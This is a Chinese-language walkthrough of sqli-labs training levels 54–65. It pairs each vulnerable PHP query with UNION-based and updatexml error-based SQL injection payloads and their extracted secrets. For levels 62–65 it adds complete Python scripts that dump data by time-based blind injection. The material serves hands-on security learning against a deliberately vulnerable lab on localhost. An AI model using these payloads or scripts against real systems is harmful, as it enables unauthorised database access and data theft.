Sqli-lab Challenges Write up

Sqli-lab Less54-65 writeup

Basic

show databases;         //查看数据库

use xxx;                //使用某个数据库

show tables;            //查看该数据库的数据表

desc xxx;               //查看该数据表的结构

select * from xxx;      //查找某个数据表的所有内容

select schema_name from information_schema.schemata;        //猜数据库

select table_name from information_schema.tables where table_schema='xxx';//猜某数据库的数据表

Select column_name from information_schema.columns where table_name='xxx';//猜某表的所有列

left(a,b);       //从左侧截取 a 的前 b 位

mid(column_name,start[,length]);     //从位置start开始,截取column_name字符串的length位,与substr作用相同

substr(string, start, length);       //从位置start开始,截取字符串string的length长度,与mid作用相同

ascii();         //将某个字符转换成ascii码

ord();           //将某个字符转换成ascii码,同ascii()

Challenges

Less-54

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

没什么过滤,直接上

0' union select 1,group_concat(schema_name),2 from information_schema.schemata;%23

得到

Your Login name:information_schema,challenges,mysql,performance_schema,security
Your Password:2 

爆破表

0' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23

得到

Your Login name:QGVTNCJQK6
Your Password:2 

爆破列

0' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='QGVTNCJQK6';%23

得到

Your Login name:id,sessid,secret_9YQQ,tryy
Your Password:2 

爆破内容

0' union select id,secret_9YQQ,tryy from QGVTNCJQK6;%23

得到

Your Login name:UEGTp3YhAO1wSaVNixYIWwMl
Your Password:3

Less-55

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

也是没什么过滤,直接上

0) union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
Your Login name:information_schema,challenges,mysql,performance_schema,security

0) union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:HSTKPKBJZX

0) union select 1,group_concat(column_name),2 from information_schema.columns where table_name='HSTKPKBJZX';%23
Your Login name:id,sessid,secret_Y1KS,tryy

0) union select id,secret_Y1KS,tryy from HSTKPKBJZX;%23
Your Login name:BsZ12SElz8qNeK2rvFOTYpkb

Less-56

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
0') union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:70ULR981EI

0') union select 1,group_concat(column_name),2 from information_schema.columns where table_name='70ULR981EI';%23
Your Login name:id,sessid,secret_KPCG,tryy

0') union select id,secret_KPCG,tryy from 70ULR981EI;%23
Your Login name:t8Q1iKTajlerR65fY1P8Lu8I

Less-57

$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

增加了"

0" union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:28YHZGI481

0" union select 1,group_concat(column_name),2 from information_schema.columns where table_name='28YHZGI481';%23
Your Login name:id,sessid,secret_152D,tryy

0" union select id,secret_152D,tryy from 28YHZGI481;%23
Your Login name:u1TfmRa1qunL2c4bGqZv4H6J

Less-58

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
}

可以看到,查询结果被用作数组序号,输出被改了,但是mysql_error()被打印了,所以我们可以直接用报错注入

0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~HG2RC34XP0~'

0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HG2RC34XP0'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_7IXP,tryy~'

0' and updatexml(1,concat(0x7e,(select secret_7IXP from HG2RC34XP0),0x7e),1);%23
XPATH syntax error: '~m20SLP9m0za56xuhE7s1awqR~'

Less-59

// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
}

还是按照之前的用报错注入

0 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~EANMX28TXI~'

0 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EANMX28TXI'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_Z6IM,tryy~'

0 and updatexml(1,concat(0x7e,(select secret_Z6IM from EANMX28TXI),0x7e),1);%23
XPATH syntax error: '~tEwpAjainXQeyDLGeSG1nuok~'

Less-60

$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
}

直接加上")绕过,依然可以用报错注入

0") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~5OJBK8U9XQ~'

0") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5OJBK8U9XQ'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_8GHX,tryy~'

0") and updatexml(1,concat(0x7e,(select secret_8GHX from 5OJBK8U9XQ),0x7e),1);%23
XPATH syntax error: '~Ij8p6anZKPghpsC4S5Ti9mgi~'

Less-61

// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
}

直接加上'))绕过,依然可以用报错注入

0')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~MP94IBBMTL~'

0')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MP94IBBMTL'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_QN8H,tryy~'

0')) and updatexml(1,concat(0x7e,(select secret_QN8H from MP94IBBMTL),0x7e),1);%23
XPATH syntax error: '~CieVXfic1dl9FuqHdChc2we3~' 

Less-62

// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    //                print_r(mysql_error());
    echo "</font>";  
}

因为注释了print_r(mysql_error()),无法用报错注入。因为还有尝试次数,只能用延时注入

写了一下 jio 本,写的比较渣

# encoding: utf-8
import requests
import re

index_url = "http://localhost:8081/Less-62/index.php?id="

header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
    'challenge':'7b4184899f8b788841fb3eaf29177fdc',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''


# for i in range(1,11):
#     print(i)
#     for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
#         j = ord(j)
#         # payload = "0') or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
#         url = index_url + payload
#         try:
#             r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
#             # print(r.text)
#         except:
#             flag += chr(j)
#             print(flag)
#             break

# flag = 'secret_'
# for i in range(8,12):
#     print(i)
#     for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
#         j = ord(j)
#         payload = "0') or if((ascii(substr((select column_name from information_schema.columns where table_name='WMBY8Y9EUL' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
#         url = index_url + payload
#         try:
#             r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
#             # print(r.text)
#         except:
#             flag += chr(j)
#             print(flag)
#             break
#secret_WPTM

for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0') or if((ascii(substr((select secret_WPTM from WMBY8Y9EUL),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
#mtvo4Z0u4wqd0nLRwxnydled

Less-63

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    //                print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
import requests
import re

index_url = "http://localhost:8081/Less-63/index.php?id="

header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
    'challenge':'31a6b5568bbb9c350c1b296d9086acf0',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''
table = ''
column = ''

for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0' or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0' or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)

Less-64

// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    //                print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
import requests
import re

index_url = "http://localhost:8081/Less-64/index.php?id="

header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
    'challenge':'6efa4aae76d29c330a3636356fa5386c',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''
table = ''
column = ''

for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0)) or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0)) or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0)) or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)

Less-65

$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';    
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    //                print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
import requests
import re

index_url = "http://localhost:8081/Less-65/index.php?id="

header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
    'challenge':'caf415945acc41218462264d7e211f37',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''
table = ''
column = ''

for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0\") or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0\") or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0\") or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)
Sql注入备忘录 Sqli-lab速刷记录(1-53)

Comments

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×